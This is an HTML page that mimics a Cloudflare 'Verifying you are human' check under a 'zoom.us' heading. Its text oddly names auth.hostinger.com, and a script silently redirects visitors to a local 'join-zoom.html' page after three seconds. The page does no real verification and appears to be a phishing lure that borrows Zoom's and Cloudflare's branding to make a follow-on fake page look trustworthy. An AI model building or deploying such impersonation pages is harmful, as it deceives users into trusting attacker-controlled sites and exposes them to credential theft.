<!DOCTYPE html>
<html lang="en-US" dir="ltr">
<head>
    <title>Just a moment...</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="robots" content="noindex,nofollow">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0
        }
        html {
            line-height: 1.15;
            -webkit-text-size-adjust: 100%;
            color: #313131;
            font-family: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif
        }
        body {
            display: flex;
            flex-direction: column;
            height: 100vh;
            min-height: 100vh;
            background-color: #f9f9f9;
        }
        .main-content {
            margin: 8rem auto;
            padding-left: 1.5rem;
            max-width: 60rem
        }
        @media (width <= 720px) {
            .main-content {
                margin-top: 4rem
            }
        }
        .h2 {
            line-height: 2.25rem;
            font-size: 1.5rem;
            font-weight: 500
        }
        @media (width <= 720px) {
            .h2 {
                line-height: 1.5rem;
                font-size: 1.25rem
            }
        }
        .core-msg {
            line-height: 1.5;
            font-size: 1rem;
            color: #555;
            margin-top: 1.5rem;
        }
        .spacer {
            margin: 2rem 0
        }
        .spacer-top {
            margin-top: 4rem
        }
        .spacer-bottom {
            margin-bottom: 2rem
        }
        .main-wrapper {
            display: flex;
            flex: 1;
            flex-direction: column;
            align-items: center
        }
        .h1 {
            line-height: 3.75rem;
            font-size: 2.5rem;
            font-weight: 500
        }
        .zone-name-title {
            font-size: 1.5rem;
            font-weight: 500;
            color: #222;
            margin-bottom: 1rem;
        }
        .loading-verifying {
            height: 76.391px;
            margin-top: 1.5rem;
        }
        .lds-ring {
            display: inline-block;
            position: relative;
            width: 1.875rem;
            height: 1.875rem
        }
        .lds-ring div {
            box-sizing: border-box;
            display: block;
            position: absolute;
            border: .3rem solid #313131;
            border-radius: 50%;
            border-color: #313131 transparent transparent transparent;
            width: 1.875rem;
            height: 1.875rem;
            animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite
        }
        .lds-ring div:nth-child(1) {
            animation-delay: -0.45s
        }
        .lds-ring div:nth-child(2) {
            animation-delay: -0.3s
        }
        .lds-ring div:nth-child(3) {
            animation-delay: -0.15s
        }
        @keyframes lds-ring {
            0% {
                transform: rotate(0deg)
            }
            100% {
                transform: rotate(360deg)
            }
        }
        .footer {
            margin: 0 auto;
            padding-right: 1.5rem;
            padding-left: 1.5rem;
            width: 100%;
            max-width: 60rem;
            line-height: 1.125rem;
            font-size: .75rem
        }
        .footer-inner {
            border-top: 1px solid #d9d9d9;
            padding-top: 1rem;
            padding-bottom: 1rem
        }
        .text-center {
            text-align: center
        }
        .ray-id {
            text-align: center
        }
        code {
            font-family: monaco, courier, monospace
        }
        .verification-text {
            font-size: 1.5rem;
            font-weight: 500;
            color: #222;
            margin-bottom: 1.5rem;
        }
        .security-msg {
            margin-top: 2rem;
        }
    </style>
    <meta http-equiv="refresh" content="360">
    <script>
        setTimeout(function() {
            window.location.href = "join-zoom.html";
        }, 3000);
    </script>
</head>
<body>
    <div class="main-wrapper" role="main">
        <div class="main-content">
            <h1 class="zone-name-title h1">zoom.us</h1>
            <p class="verification-text">Verifying you are human. This may take a few seconds.</p>
            <div class="loading-verifying">
                <div class="lds-ring">
                    <div></div>
                    <div></div>
                    <div></div>
                    <div></div>
                </div>
            </div>
            <p class="core-msg security-msg">auth.hostinger.com needs to review the security of your connection before proceeding.</p>
        </div>
    </div>
    <div class="footer" role="contentinfo">
        <div class="footer-inner">
            <div class="text-center" id="footer-text">Performance &amp; security by <a rel="noopener noreferrer" href="https://www.cloudflare.com?utm_source=challenge&amp;utm_campaign=l" target="_blank">Cloudflare</a></div>
        </div>
    </div>
</body>
</html>